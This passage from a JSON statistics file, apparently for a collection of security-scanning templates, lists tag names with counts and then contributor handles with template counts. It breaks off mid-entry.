:"tracer","count":1},{"name":"eap","count":1},{"name":"opnsense","count":1},{"name":"message-me","count":1},{"name":"ssi","count":1},{"name":"websvn","count":1},{"name":"fancyproduct","count":1},{"name":"ecommerce-product-catalog","count":1},{"name":"threatq","count":1},{"name":"homedesign3d","count":1},{"name":"hostuxsocial-mastodon-instance","count":1},{"name":"distance","count":1},{"name":"curcy","count":1},{"name":"simple-urls","count":1},{"name":"artbreeder","count":1},{"name":"davantis","count":1},{"name":"mediation","count":1},{"name":"hackerearth","count":1},{"name":"sunflower","count":1},{"name":"asa","count":1},{"name":"solman","count":1},{"name":"zzzphp","count":1},{"name":"secnet","count":1},{"name":"opensmtpd","count":1},{"name":"chyoa","count":1},{"name":"kivicare-clinic-management-system","count":1},{"name":"wagtail","count":1},{"name":"zebra","count":1},{"name":"alertmanager","count":1},{"name":"optiLink","count":1},{"name":"rujjie","count":1},{"name":"x-ui","count":1},{"name":"nzbget","count":1},{"name":"robomongo","count":1},{"name":"mix","count":1},{"name":"cvms","count":1},{"name":"primetek","count":1},{"name":"wp-fundraising-donation","count":1},{"name":"exagrid","count":1},{"name":"serverstatus","count":1},{"name":"lobsters","count":1},{"name":"getresponse","count":1},{"name":"jnoj","count":1},{"name":"isams","count":1},{"name":"datataker","count":1},{"name":"sunshine","count":1},{"name":"myfitnesspal-community","count":1},{"name":"onlinefarm","count":1},{"name":"bigo-live","count":1},{"name":"imageshack","count":1},{"name":"sqlbuddy","count":1},{"name":"pivotaltracker","count":1},{"name":"soplanning","count":1},{"name":"jsfiddle","count":1},{"name":"aspect","count":1},{"name":"geocode","count":1},{"name":"luci","count":1},{"name":"mastonyc-mastodon-instance","count":1},{"name":"yellowfin","count":1},{"name":"qts","count":1},{"name":"mini_httpd","count":1},{"name":"directadmin","count":1},{"name":"place","count":1},{"name":"sumo","count":1},{"name":"chaturbate","count":1},{"name":"goodlayerslms","count":1},{"name":"archibus","count":1},{"name":"revolut","count":1},{"name":"depop","count":1},{"name":"mintme","count":1},{"name":"ogc","count":1},{"name":"eyoucms","count":1},{"name":"phpminiadmin","count":1},{"name":"nownodes","count":1},{"name":"storycorps","count":1},{"name":"siebel","count":1},{"name":"trojan","count":1},{"name":"jspx","count":1},{"name":"justwriting","count":1},{"name":"smuggling","count":1},{"name":"utipio","count":1},{"name":"wordpress-country-selector","count":1},{"name":"ez","count":1},{"name":"ccm","count":1},{"name":"wakatime","count":1},{"name":"federatedpress-mastodon-instance","count":1},{"name":"brickset","count":1},{"name":"thinkserver","count":1},{"name":"pdi","count":1},{"name":"zenario","count":1},{"name":"solarlog","count":1},{"name":"fortilogger","count":1},{"name":"picsart","count":1},{"name":"phpMyChat","count":1},{"name":"dwr","count":1},{"name":"stackstorm","count":1},{"name":"ztp","count":1},{"name":"npmjs","count":1},{"name":"eyelock","count":1},{"name":"tbk","count":1},{"name":"biqsdrive","count":1},{"name":"rsb","count":1},{"name":"mcuuid-minecraft","count":1},{"name":"producthunt","count":1},{"name":"steemit","count":1},{"name":"cobub","count":1},{"name":"filetransfer","count":1},{"name":"dozzle","count":1},{"name":"ncbi","count":1},{"name":"datahub","count":1},{"name":"avnil-pdf","count":1},{"name":"chefio","count":1},{"name":"okidoki","count":1},{"name":"datingru","count":1},{"name":"master","count":1},{"name":"bing","count":1},{"name":"racksnet","count":1},{"name":"netic","count":1},{"name":"monday","count":1},{"name":"phpok","count":1},{"name":"mirasys","count":1},{"name":"bigfix","count":1},{"name":"h2c","count":1},{"name":"find","count":1},{"name":"modoboa","count":1},{"name":"line","count":1},{"name":"acontent","count":1},{"name":"openpagerank","count":1},{"name":"maroc-nl","count":1},{"name":"workreap","count":1},{"name":"oscommerce","count":1},{"name":"nport","count":1},{"name":"hugging-face","count":1},{"name":"promodj","count":1},{"name":"ewm","count":1},{"name":"jumpcloud","count":1},{"name":"elmah","count":1},{"name":"lychee","count":1},{"name":"zope","count":1},{"name":"bdsmlr","count":1},{"name":"zenrows","count":1},{"name":"aspera","count":1},{"name":"mastodon-defcon","count":1},{"name":"file-download","count":1},{"name":"flureedb","count":1},{"name":"zendframework","count":1},{"name":"mylittleadmin","count":1},{"name":"pendo","count":1},{"name":"gsoap","count":1},{"name":"acme","count":1},{"name":"gallery","count":1},{"name":"nh","count":1},{"name":"biotime","count":1},{"name":"teltonika","count":1},{"name":"bagisto","count":1},{"name":"tiktok","count":1},{"name":"pghero","count":1},{"name":"omi","count":1},{"name":"atg","count":1},{"name":"projectdiscovery","count":1},{"name":"nedi","count":1},{"name":"woo-order-export-lite","count":1},{"name":"1forge","count":1},{"name":"3dnews","count":1},{"name":"emobile","count":1},{"name":"patch","count":1},{"name":"honeywell","count":1},{"name":"queer","count":1},{"name":"stytch","count":1},{"name":"tup","count":1},{"name":"themefusion","count":1},{"name":"bumsys","count":1},{"name":"orangehrm","count":1},{"name":"h-sphere","count":1},{"name":"member-hero","count":1},{"name":"soundcloud","count":1},{"name":"liberty","count":1},{"name":"libretoothgr-mastodon-instance","count":1},{"name":"udraw","count":1},{"name":"concourse","count":1},{"name":"twpro","count":1},{"name":"xunchi","count":1},{"name":"cypress","count":1},{"name":"bodybuildingcom","count":1},{"name":"trilithic","count":1},{"name":"camunda","count":1},{"name":"mobiproxy","count":1},{"name":"vero","count":1},{"name":"apigee","count":1},{"name":"getmonero","count":1},{"name":"html2wp","count":1},{"name":"joomsport-sports-league-results-management","count":1},{"name":"trino","count":1},{"name":"kwejkpl","count":1},{"name":"v2924","count":1},{"name":"grandprof","count":1},{"name":"mod-jk","count":1},{"name":"discord","count":1},{"name":"statistics","count":1},{"name":"orangeforum","count":1},{"name":"muck-rack","count":1},{"name":"hookbot","count":1},{"name":"hc-custom-wp-admin-url","count":1},{"name":"vcloud","count":1},{"name":"mastodonbooksnet-mastodon-instance","count":1},{"name":"ipstack","count":1},{"name":"emlog","count":1},{"name":"breach-forums","count":1},{"name":"pagekit","count":1},{"name":"pokec","count":1},{"name":"maxsite","count":1},{"name":"xeams","count":1},{"name":"stripchat","count":1},{"name":"jbpm","count":1},{"name":"zenserp","count":1},{"name":"chesscom","count":1},{"name":"demotywatory","count":1},{"name":"tracing","count":1},{"name":"jabber","count":1},{"name":"uservoice","count":1},{"name":"wdja","count":1},{"name":"cvnd2018","count":1},{"name":"extreme","count":1},{"name":"register","count":1},{"name":"sympa","count":1},{"name":"mastodon-climatejusticerocks","count":1},{"name":"extractor","count":1},{"name":"popl","count":1},{"name":"void","count":1},{"name":"yealink","count":1},{"name":"fine-art-america","count":1},{"name":"pettingzooco-mastodon-instance","count":1},{"name":"wmt","count":1},{"name":"casemanager","count":1},{"name":"checkmarx","count":1},{"name":"hubski","count":1},{"name":"playable","count":1},{"name":"slstudio","count":1},{"name":"lanproxy","count":1},{"name":"h2","count":1},{"name":"mining","count":1},{"name":"agilecrm","count":1},{"name":"proxycrawl","count":1},{"name":"default-jwt","count":1},{"name":"setlistfm","count":1},{"name":"wowhead","count":1},{"name":"cooperhewitt","count":1},{"name":"secure-copy-content-protection","count":1},{"name":"saltapi","count":1},{"name":"issuu","count":1},{"name":"myvuehelp","count":1},{"name":"incapptic-connect","count":1},{"name":"toolkit","count":1},{"name":"game-debate","count":1},{"name":"unyson","count":1},{"name":"enterprise","count":1},{"name":"newgrounds","count":1},{"name":"tradingview","count":1},{"name":"wget","count":1},{"name":"geniusocean","count":1},{"name":"apos","count":1},{"name":"jinher","count":1},{"name":"registrationmagic","count":1},{"name":"opensource","count":1},{"name":"pelco","count":1},{"name":"marshmallow","count":1},{"name":"imgsrcru","count":1},{"name":"aveva","count":1},{"name":"climatejusticerocks-mastodon-instance","count":1},{"name":"facturascripts","count":1},{"name":"thegatewaypundit","count":1},{"name":"temporal","count":1},{"name":"mobotix","count":1},{"name":"newspaper","count":1},{"name":"webclient","count":1},{"name":"librenms","count":1},{"name":"adultism","count":1},{"name":"ulubpl","count":1},{"name":"atechmedia","count":1},{"name":"timesheet","count":1},{"name":"logontracer","count":1},{"name":"arcade","count":1},{"name":"auxin-elements","count":1},{"name":"ubiquiti","count":1},{"name":"duolingo","count":1},{"name":"ctflearn","count":1},{"name":"elloco","count":1},{"name":"pornhub-users","count":1},{"name":"pingdom","count":1},{"name":"leanix","count":1},{"name":"xanga","count":1},{"name":"bolt","count":1},{"name":"retool","count":1},{"name":"analytics","count":1},{"name":"gyra","count":1},{"name":"logger1000","count":1},{"name":"alchemy","count":1},{"name":"discusselasticco","count":1},{"name":"codekop","count":1},{"name":"taskrabbit","count":1},{"name":"clockwatch","count":1},{"name":"wpquery","count":1},{"name":"harmony","count":1},{"name":"ioncube","count":1},{"name":"tootingch-mastodon-instance","count":1},{"name":"discusssocial-mastodon-instance","count":1},{"name":"updraftplus","count":1},{"name":"pulsar360","count":1},{"name":"browserless","count":1},{"name":"acemanager","count":1},{"name":"secnet-ac","count":1},{"name":"snipeit","count":1},{"name":"amdoren","count":1},{"name":"anonymous","count":1},{"name":"hanime","count":1},{"name":"inaturalist","count":1},{"name":"vine","count":1},{"name":"dapr","count":1},{"name":"rainloop","count":1},{"name":"nconf","count":1},{"name":"infinitewp","count":1},{"name":"logitech","count":1},{"name":"idera","count":1},{"name":"micro","count":1},{"name":"short.io","count":1},{"name":"verify","count":1},{"name":"bacnet","count":1},{"name":"adWidget","count":1},{"name":"cybrotech","count":1},{"name":"admire-me","count":1},{"name":"easyen","count":1},{"name":"our-freedom-book","count":1},{"name":"locklizard","count":1},{"name":"apiflash","count":1},{"name":"fortiddos","count":1},{"name":"plone","count":1},{"name":"kingdee","count":1},{"name":"kickstarter","count":1},{"name":"sentimente","count":1},{"name":"watershed","count":1},{"name":"meraki","count":1},{"name":"remkon","count":1},{"name":"contentkeeper","count":1},{"name":"cgit","count":1},{"name":"atutor","count":1},{"name":"blueiris","count":1},{"name":"holidayapi","count":1},{"name":"brandfolder","count":1},{"name":"txt","count":1},{"name":"axiom","count":1},{"name":"forumprawneorg","count":1},{"name":"askfm","count":1},{"name":"xvideos-profiles","count":1},{"name":"hackernoon","count":1},{"name":"bhagavadgita","count":1},{"name":"free5gc","count":1},{"name":"apex-legends","count":1},{"name":"sceditor","count":1},{"name":"dropbox","count":1},{"name":"natemail","count":1},{"name":"caringbridge","count":1},{"name":"getgrav","count":1},{"name":"n-central","count":1},{"name":"colourlovers","count":1},{"name":"c99","count":1},{"name":"droners","count":1},{"name":"hdnetwork","count":1},{"name":"openweather","count":1},{"name":"debian","count":1},{"name":"nessus","count":1},{"name":"codoforumrce","count":1},{"name":"rumblechannel","count":1},{"name":"wp-cli","count":1},{"name":"watchmemorecom","count":1},{"name":"acsoft","count":1},{"name":"sma1000","count":1},{"name":"jk","count":1},{"name":"tagged","count":1},{"name":"ubisoft","count":1},{"name":"media","count":1},{"name":"mastodon-polsocial","count":1},{"name":"director","count":1},{"name":"webcomco","count":1},{"name":"weheartit","count":1},{"name":"zatrybipl","count":1},{"name":"maximo","count":1},{"name":"webasyst","count":1},{"name":"forescout","count":1},{"name":"taiga","count":1},{"name":"webctrl","count":1},{"name":"iucn","count":1},{"name":"duplicator","count":1},{"name":"faust","count":1},{"name":"themeforest","count":1},{"name":"formcraft3","count":1},{"name":"details","count":1},{"name":"account-takeover","count":1},{"name":"broker","count":1},{"name":"huemagic","count":1},{"name":"b2bbuilder","count":1},{"name":"woocs","count":1},{"name":"bunpro","count":1},{"name":"wifi","count":1},{"name":"quixplorer","count":1},{"name":"easy-digital-downloads","count":1},{"name":"advance-custom-field","count":1},{"name":"mobile","count":1},{"name":"gumroad","count":1},{"name":"phpnow","count":1},{"name":"arduino","count":1},{"name":"mcname-minecraft","count":1},{"name":"paytm","count":1},{"name":"footprints","count":1},{"name":"osquery","count":1},{"name":"somansa","count":1},{"name":"room-alert","count":1},{"name":"coverity","count":1},{"name":"rustici","count":1},{"name":"suprema","count":1},{"name":"goahead","count":1},{"name":"cloudera","count":1},{"name":"dompdf","count":1},{"name":"shanii-writes","count":1},{"name":"ru-123rf","count":1},{"name":"currencyfreaks","count":1},{"name":"coinlayer","count":1},{"name":"petfinder","count":1},{"name":"quip","count":1},{"name":"documentor-lite","count":1},{"name":"moinmoin","count":1},{"name":"minecraft-list","count":1},{"name":"cashapp","count":1},{"name":"vibilagare","count":1},{"name":"arris","count":1},{"name":"namedprocess","count":1},{"name":"kongregate","count":1},{"name":"kkFileview","count":1},{"name":"jupyterhub","count":1},{"name":"nsq","count":1},{"name":"disabledrocks-mastodon-instance","count":1},{"name":"thinkadmin","count":1},{"name":"apteka","count":1},{"name":"e2pdf","count":1},{"name":"jumpserver","count":1},{"name":"tuxedo","count":1},{"name":"schneider","count":1},{"name":"sage","count":1},{"name":"cameo","count":1},{"name":"docebo","count":1},{"name":"oki","count":1},{"name":"mongoose","count":1},{"name":"browshot","count":1},{"name":"pdf-generator-for-wp","count":1},{"name":"fodors-forum","count":1},{"name":"jalios","count":1},{"name":"rss","count":1},{"name":"cname","count":1},{"name":"nexusphp","count":1},{"name":"dailymotion","count":1},{"name":"labtech","count":1},{"name":"dicoogle","count":1},{"name":"feifeicms","count":1},{"name":"ojs","count":1},{"name":"pcoweb","count":1},{"name":"radius","count":1},{"name":"magabook","count":1},{"name":"sco","count":1},{"name":"ui","count":1},{"name":"easy","count":1},{"name":"21buttons","count":1},{"name":"roads","count":1},{"name":"etsy","count":1},{"name":"solikick","count":1},{"name":"atlantis","count":1},{"name":"mesos","count":1},{"name":"readthedocs","count":1},{"name":"deimosc2","count":1},{"name":"oliver","count":1},{"name":"crevado","count":1},{"name":"roundcube","count":1},{"name":"hiawatha","count":1},{"name":"fleet","count":1},{"name":"screenshot","count":1},{"name":"zaver","count":1},{"name":"airee","count":1},{"name":"cse","count":1},{"name":"msmtp","count":1},{"name":"ticketmaster","count":1},{"name":"download","count":1},{"name":"edms","count":1},{"name":"management","count":1},{"name":"strava","count":1},{"name":"olivetti","count":1},{"name":"sassy","count":1},{"name":"yahoo-japan-auction","count":1},{"name":"etherscan","count":1},{"name":"termtalk","count":1},{"name":"gargoyle","count":1},{"name":"crypto","count":1},{"name":"polywork","count":1},{"name":"scoutwiki","count":1},{"name":"ecom","count":1},{"name":"wp-gdpr-compliance","count":1},{"name":"phonepe","count":1},{"name":"albicla","count":1},{"name":"graphicssocial-mastodon-instance","count":1},{"name":"yaws","count":1},{"name":"boot","count":1},{"name":"zoomitir","count":1},{"name":"sarg","count":1},{"name":"independent-academia","count":1},{"name":"wikidot","count":1},{"name":"mrtg","count":1},{"name":"totaljs","count":1},{"name":"openvz","count":1},{"name":"gamespot","count":1},{"name":"cucm","count":1},{"name":"realteo","count":1},{"name":"pyspider","count":1},{"name":"lfw","count":1},{"name":"nocodb","count":1},{"name":"woody","count":1},{"name":"nc2","count":1},{"name":"csod","count":1},{"name":"maccmsv10","count":1},{"name":"ecshop","count":1},{"name":"hcl","count":1},{"name":"customize-login-image","count":1},{"name":"grails","count":1},{"name":"ddownload","count":1},{"name":"careerhabr","count":1},{"name":"tox","count":1},{"name":"imgur","count":1},{"name":"inetutils","count":1},{"name":"wpb-show-core","count":1},{"name":"finereport","count":1},{"name":"opensearch","count":1},{"name":"jaspersoft","count":1},{"name":"qmail","count":1},{"name":"activecollab","count":1},{"name":"narnoo-distributor","count":1},{"name":"esmtp","count":1},{"name":"bentbox","count":1},{"name":"planon","count":1},{"name":"charity","count":1},{"name":"eibiz","count":1},{"name":"cheezburger","count":1},{"name":"svnserve","count":1},{"name":"uiuxdevsocial-mastodon-instance","count":1},{"name":"xvr","count":1},{"name":"gloriatv","count":1},{"name":"mixlr","count":1},{"name":"avigilon","count":1},{"name":"steam","count":1},{"name":"sureline","count":1},{"name":"clustering","count":1},{"name":"tenor","count":1},{"name":"moneysavingexpert","count":1},{"name":"wanelo","count":1},{"name":"awin","count":1},{"name":"artists-clients","count":1},{"name":"veriz0wn","count":1},{"name":"championat","count":1},{"name":"graphiql","count":1},{"name":"h5sconsole","count":1},{"name":"mylittlebackup","count":1},{"name":"trilium","count":1},{"name":"webftp","count":1},{"name":"wp-stats-manager","count":1},{"name":"linear","count":1},{"name":"dynamic","count":1},{"name":"jeecg-boot","count":1},{"name":"groupib","count":1},{"name":"ifunny","count":1},{"name":"avalanche","count":1},{"name":"wireless","count":1},{"name":"sogo","count":1},{"name":"clearfy-cache","count":1},{"name":"pkp-lib","count":1},{"name":"cdata","count":1},{"name":"idemia","count":1},{"name":"researchgate","count":1},{"name":"xproxy","count":1},{"name":"gmail","count":1},{"name":"istat","count":1},{"name":"ftm","count":1},{"name":"adserver","count":1},{"name":"thedogapi","count":1},{"name":"html2pdf","count":1},{"name":"gira","count":1},{"name":"osint-image","count":1},{"name":"fandom","count":1},{"name":"mastodon-101010pl","count":1},{"name":"imagements","count":1},{"name":"enumeration","count":1},{"name":"luftguitar","count":1},{"name":"openedx","count":1},{"name":"kaggle","count":1},{"name":"ecsimagingpacs","count":1},{"name":"autonomy","count":1},{"name":"js-analyse","count":1},{"name":"alloannonces","count":1},{"name":"acf","count":1},{"name":"engage","count":1},{"name":"bitchute","count":1},{"name":"netvibes","count":1},{"name":"mailwatch","count":1},{"name":"eureka","count":1},{"name":"gilacms","count":1},{"name":"rumbleuser","count":1},{"name":"asgaros-forum","count":1},{"name":"3dtoday","count":1},{"name":"codeforces","count":1},{"name":"coinranking","count":1},{"name":"europeana","count":1},{"name":"opennebula","count":1},{"name":"cowboys4angels","count":1},{"name":"zap","count":1},{"name":"sast","count":1},{"name":"freepbx","count":1},{"name":"gnu","count":1},{"name":"smh","count":1},{"name":"ultimate-faqs","count":1},{"name":"blackduck","count":1},{"name":"apim","count":1},{"name":"mongo-express","count":1},{"name":"iplanet","count":1},{"name":"sling","count":1},{"name":"furaffinity","count":1},{"name":"totalwar","count":1},{"name":"hivemanager","count":1},{"name":"meshcentral","count":1},{"name":"vnc","count":1},{"name":"h5s","count":1},{"name":"livemasterru","count":1},{"name":"social-msdn","count":1},{"name":"admidio","count":1},{"name":"shirnecms","count":1},{"name":"noescape","count":1},{"name":"suitecrm","count":1},{"name":"biolink","count":1},{"name":"supervisor","count":1},{"name":"raspap","count":1},{"name":"easy-student-results","count":1},{"name":"fansly","count":1},{"name":"pronounspage","count":1},{"name":"cd-action","count":1},{"name":"bullwark","count":1},{"name":"speakout","count":1},{"name":"eos","count":1},{"name":"darkstat","count":1},{"name":"fox","count":1},{"name":"backpack","count":1},{"name":"soloby","count":1},{"name":"clickup","count":1},{"name":"zbiornik","count":1},{"name":"flyteconsole","count":1},{"name":"wordpress-support","count":1},{"name":"wp-shoutbox-live-chat","count":1},{"name":"kaes","count":1},{"name":"zoneminder","count":1},{"name":"biostar2","count":1},{"name":"ecosys","count":1},{"name":"carbonmade","count":1},{"name":"genie","count":1},{"name":"agegate","count":1},{"name":"viaware","count":1},{"name":"cloudanalytics","count":1},{"name":"poisoning","count":1},{"name":"etouch","count":1},{"name":"csrfguard","count":1},{"name":"intel","count":1},{"name":"tunefind","count":1},{"name":"domos","count":1},{"name":"mapmytracks","count":1},{"name":"clickhouse","count":1},{"name":"verint","count":1},{"name":"novus","count":1},{"name":"wix","count":1},{"name":"mismatched","count":1},{"name":"sso","count":1},{"name":"apolloadminservice","count":1},{"name":"tf2-backpack-examiner","count":1},{"name":"ab-map","count":1},{"name":"voice123","count":1},{"name":"gunicorn","count":1},{"name":"metaview","count":1},{"name":"quasar","count":1},{"name":"mastodon-chaossocial","count":1},{"name":"o2","count":1},{"name":"pewex","count":1},{"name":"dplus","count":1},{"name":"lacie","count":1},{"name":"orbiteam","count":1},{"name":"awx","count":1},{"name":"global","count":1},{"name":"appweb","count":1},{"name":"gn-publisher","count":1},{"name":"app","count":1},{"name":"curiouscat","count":1},{"name":"weboftrust","count":1},{"name":"mongoshake","count":1},{"name":"jspxcms","count":1},{"name":"kyocera","count":1},{"name":"gift-voucher","count":1},{"name":"ismygirl","count":1},{"name":"pagecdn","count":1},{"name":"mqtt","count":1},{"name":"parler","count":1},{"name":"omniampx","count":1},{"name":"lutron","count":1},{"name":"fastvue","count":1},{"name":"dapp","count":1},{"name":"age-verification","count":1},{"name":"intellect","count":1},{"name":"lightdash","count":1}],"authors":[{"name":"dhiyaneshdk","count":907},{"name":"dwisiswant0","count":797},{"name":"daffainfo","count":664},{"name":"pikpikcu","count":353},{"name":"pdteam","count":280},{"name":"pussycat0x","count":261},{"name":"geeknik","count":221},{"name":"ricardomaia","count":220},{"name":"ritikchaddha","count":218},{"name":"0x_akoko","count":179},{"name":"theamanrawat","count":177},{"name":"princechaddha","count":156},{"name":"gy741","count":145},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"r3y3r53","count":80},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"akincibor","count":58},{"name":"for3stco1d","count":55},{"name":"gaurang","count":42},{"name":"philippedelteil","count":41},{"name":"righettod","count":41},{"name":"edoardottt","count":40},{"name":"pdresearch","count":39},{"name":"c-sh0","count":35},{"name":"adam crosser","count":31},{"name":"iamnoooob","count":29},{"name":"rootxharsh","count":28},{"name":"ice3man","count":26},{"name":"hardik-solanki","count":24},{"name":"pwnhxl","count":24},{"name":"organiccrap","count":24},{"name":"johnk3r","count":23},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"j4vaovo","count":22},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"ctflearner","count":16},{"name":"parthmalhotra","count":16},{"name":"lu4nx","count":15},{"name":"sheikhrishad","count":15},{"name":"random-robbie","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"theabhinavgaur","count":13},{"name":"tenbird","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":13},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"cyllective","count":11},{"name":"dogasantos","count":11},{"name":"co5mos","count":10},{"name":"0xpugazh","count":10},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"alph4byt3","count":10},{"name":"logicalhunter","count":10},{"name":"fabaff","count":9},{"name":"nullfuzz","count":9},{"name":"oppsec","count":9},{"name":"harsh","count":9},{"name":"0x240x23elu","count":9},{"name":"emadshanab","count":9},{"name":"olearycrew","count":8},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"_0xf4n9x_","count":8},{"name":"veshraj","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"leovalcante","count":7},{"name":"caspergn","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"its0x08","count":7},{"name":"amit-jd","count":7},{"name":"adamcrosser","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"kophjager007","count":7},{"name":"xelkomy","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"noraj","count":6},{"name":"pathtaga","count":6},{"name":"puzzlepeaches","count":6},{"name":"ja1sh","count":6},{"name":"evan rubinstein","count":6},{"name":"gitlab red team","count":6},{"name":"justaacat","count":6},{"name":"devang-solanki","count":6},{"name":"pentest_swissky","count":6},{"name":"imnightmaree","count":6},{"name":"clem9669","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"nodauf","count":6},{"name":"panch0r3d","count":5},{"name":"irshad ahamed","count":5},{"name":"mr-xn","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"yanyun","count":5},{"name":"vicrack","count":5},{"name":"prajiteshsingh","count":5},{"name":"s0obi","count":5},{"name":"r12w4n","count":5},{"name":"defr0ggy","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"podalirius","count":5},{"name":"bhutch","count":4},{"name":"r3naissance","count":4},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"3th1c_yuk1","count":4},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"mastercho","count":4},{"name":"dolev farhi","count":4},{"name":"kazet","count":4},{"name":"powerexploit","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"e_schultze_","count":4},{"name":"shine","count":4},{"name":"binaryfigments","count":3},{"name":"whoever","count":3},{"name":"unstabl3","count":3},{"name":"davidmckennirey","count":3},{"name":"lark-lab","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"atomiczsec","count":3},{"name":"matt galligan","count":3},{"name":"0w4ys","count":3},{"name":"andydoering","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fxploit","count":3},{"name":"mavericknerd","count":3},{"name":"vagnerd","count":3},{"name":"vsh00t","count":3},{"name":"johnjhacking","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"canberbamber","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"hahwul","count":3},{"name":"true13","count":3},{"name":"sushantkamble","count":3},{"name":"ambassify","count":3},{"name":"arm!tage","count":3},{"name":"_generic_human_","count":3},{"name":"evergreencartoons","count":3},{"name":"ekrause","count":3},{"name":"splint3r7","count":3},{"name":"bernardofsr","count":3},{"name":"cheesymoon","count":3},{"name":"skeltavik","count":3},{"name":"emenalf","count":3},{"name":"ph33r","count":3},{"name":"jarijaas","count":3},{"name":"arcc","count":3},{"name":"badboycxcc","count":3},{"name":"lucasljm2001","count":3},{"name":"alifathi-h1","count":3},{"name":"k0pak4","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"fyoorer","count":3},{"name":"huowuzhao","count":3},{"name":"taielab","count":3},{"name":"swissky","count":3},{"name":"dr0pd34d","count":3},{"name":"dogancanbakir","count":2},{"name":"kiblyn11","count":2},{"name":"hetroublemakr","count":2},{"name":"joshlarsen","count":2},{"name":"nvn1729","count":2},{"name":"supras","count":2},{"name":"raesene","count":2},{"name":"bp0lr","count":2},{"name":"manas_harsh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mohammedsaneem","count":2},{"name":"smaranchand","count":2},{"name":"ggranjus","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"thezakman","count":2},{"name":"korteke","count":2},{"name":"foulenzer","count":2},{"name":"socketz","count":2},{"name":"myztique","count":2},{"name":"notnotnotveg","count":2},{"name":"moritz nentwig","count":2},{"name":"streetofhackerr007","count":2},{"name":"bsysop","count":2},{"name":"0xsmiley","count":2},{"name":"wa1tf0rme","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"github.com/its0x08","count":2},{"name":"lum8rjack","count":2},{"name":"ajaysenr","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"pxmme1337","count":2},{"name":"sbani","count":2},{"name":"kishore-hariram","count":2},{"name":"ree4pwn","count":2},{"name":"codexlynx","count":2},{"name":"bananabr","count":2},{"name":"convisoappsec","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"udit_thakkur","count":2},{"name":"shelled","count":2},{"name":"666asd","count":2},{"name":"redteambrasil","count":2},{"name":"cckuakilong","count":2},{"name":"randomrobbie","count":2},{"name":"joshua rogers","count":2},{"name":"z0ne","count":2},{"name":"parth","count":2},{"name":"gal nagli","count":2},{"name":"lotusdll","count":2},{"name":"0xnirvana","count":2},{"name":"coldfish","count":2},{"name":"nybble04","count":2},{"name":"0xprial","count":2},{"name":"d4vy","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"gevakun","count":2},{"name":"dahse89","count":2},{"name":"bing0o","count":2},{"name":"c3l3si4n","count":2},{"name":"0xelkomy","count":2},{"name":"sinkettu","count":2},{"name":"cocxanh","count":2},{"name":"nuk3s3c","count":2},{"name":"zomsop82","count":2},{"name":"uomogrande","count":2},{"name":"paradessia","count":2},{"name":"afaq","count":2},{"name":"thardt-praetorian","count":2},{"name":"k11h-de","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"gtrrnr","count":2},{"name":"luci","count":2},{"name":"clarkvoss","count":2},{"name":"brenocss","count":2},{"name":"g4l1t0","count":2},{"name":"rafaelwdornelas","count":2},{"name":"m4lwhere","count":2},{"name":"koti2","count":2},{"name":"hackerarpan","count":2},{"name":"maximus decimus","count":2},{"name":"v0idc0de","count":2},{"name":"vavkamil","count":2},{"name":"geekby","count":2},{"name":"n-thumann","count":2},{"name":"8arthur","count":2},{"name":"dbrwsky","count":2},{"name":"brucelsone","count":2},{"name":"paperpen","count":2},{"name":"kre80r","count":2},{"name":"megamansec","count":2},{"name":"sascha brendel","count":2},{"name":"heeress","count":2},{"name":"ehsahil","count":2},{"name":"0xcrypto","count":2},{"name":"martincodes-de","count":2},{"name":"x1m_martijn","count":2},{"name":"amsda","count":2},{"name":"randomdhiraj","count":2},{"name":"j3ssie","count":2},{"name":"joeldeleep","count":2},{"name":"y4er","count":2},{"name":"yashanand155","count":1},{"name":"kareemse1im","count":1},{"name":"kabirsuda","count":1},{"name":"ayadi","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"pussycat0","count":1},{"name":"gboddin","count":1},{"name":"ohlinge","count":1},{"name":"bughuntersurya","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"aron molnar","count":1},{"name":"ivo palazzolo 